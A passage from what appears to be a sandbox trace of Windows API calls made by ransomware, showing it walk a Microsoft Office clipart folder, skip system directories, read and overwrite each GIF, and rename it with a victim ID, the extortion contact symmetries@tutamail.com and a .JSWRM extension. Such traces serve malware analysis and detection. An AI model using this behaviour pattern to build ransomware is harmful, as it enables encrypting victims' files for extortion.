lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0080.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.040] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099198.GIF", cAlternateFileName="")) returned 1 [0080.040] lstrcmpiW (lpString1="J0099198.GIF", lpString2=".") returned 1 [0080.040] lstrcmpiW (lpString1="J0099198.GIF", lpString2="..") returned 1 [0080.040] lstrcmpiW (lpString1="J0099198.GIF", lpString2="...") returned 1 [0080.040] lstrcmpiW (lpString1="J0099198.GIF", lpString2="windows") returned -1 [0080.040] lstrcmpiW (lpString1="J0099198.GIF", lpString2="recovery") returned -1 [0080.041] lstrcmpiW (lpString1="J0099198.GIF", lpString2="perflogs") returned -1 [0080.041] lstrcmpiW (lpString1="J0099198.GIF", lpString2="documents and settings") returned 1 [0080.041] lstrcmpiW (lpString1="J0099198.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.041] lstrcmpiW (lpString1="J0099198.GIF", lpString2="system volume information") returned -1 [0080.041] lstrcmpiW (lpString1="J0099198.GIF", lpString2="msocache") returned -1 [0080.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0080.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099198.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099198.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099198.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0080.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099198.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099198.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099198.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0080.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0080.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.041] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5259) returned 1 [0080.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1480) returned 0x205850 [0080.042] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1480, lpOverlapped=0x0) returned 1 [0080.043] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.043] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1480, lpOverlapped=0x0) returned 1 [0080.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.044] CloseHandle (hObject=0x314) returned 1 [0080.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0080.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0080.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0080.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0080.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0080.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0080.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.044] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0080.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0080.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0080.045] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x84b7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099199.GIF", cAlternateFileName="")) returned 1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2=".") returned 1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="..") returned 1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="...") returned 1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="windows") returned -1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="recovery") returned -1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="perflogs") returned -1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="documents and settings") returned 1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="system volume information") returned -1 [0080.045] lstrcmpiW (lpString1="J0099199.GIF", lpString2="msocache") returned -1 [0080.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099199.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099199.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099199.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0080.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099199.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099199.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099199.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0080.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0080.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0080.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0080.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.046] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33975) returned 1 [0080.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x84b0) returned 0x24d210 [0080.046] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x84b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x84b0, lpOverlapped=0x0) returned 1 [0080.050] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.050] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x84b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x84b0, lpOverlapped=0x0) returned 1 [0080.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.051] CloseHandle (hObject=0x314) returned 1 [0080.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0080.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0080.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0080.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0080.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0080.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.052] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0080.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0080.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0080.053] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe56c811, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe56c811, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x409f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099200.GIF", cAlternateFileName="")) returned 1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2=".") returned 1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="..") returned 1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="...") returned 1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="windows") returned -1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="recovery") returned -1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="perflogs") returned -1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="documents and settings") returned 1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="system volume information") returned -1 [0080.053] lstrcmpiW (lpString1="J0099200.GIF", lpString2="msocache") returned -1 [0080.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099200.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099200.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099200.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099200.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099200.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099200.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0080.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0080.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.054] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16543) returned 1 [0080.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4090) returned 0x24d210 [0080.054] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4090, lpOverlapped=0x0) returned 1 [0080.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.057] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4090, lpOverlapped=0x0) returned 1 [0080.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.057] CloseHandle (hObject=0x314) returned 1 [0080.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0080.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0080.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0080.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0080.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0080.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.058] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0080.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.059] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc8c9, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099201.GIF", cAlternateFileName="")) returned 1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2=".") returned 1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="..") returned 1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="...") returned 1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="windows") returned -1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="recovery") returned -1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="perflogs") returned -1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="documents and settings") returned 1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="system volume information") returned -1 [0080.059] lstrcmpiW (lpString1="J0099201.GIF", lpString2="msocache") returned -1 [0080.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0080.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099201.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099201.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099201.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.059] HeapFree (in: 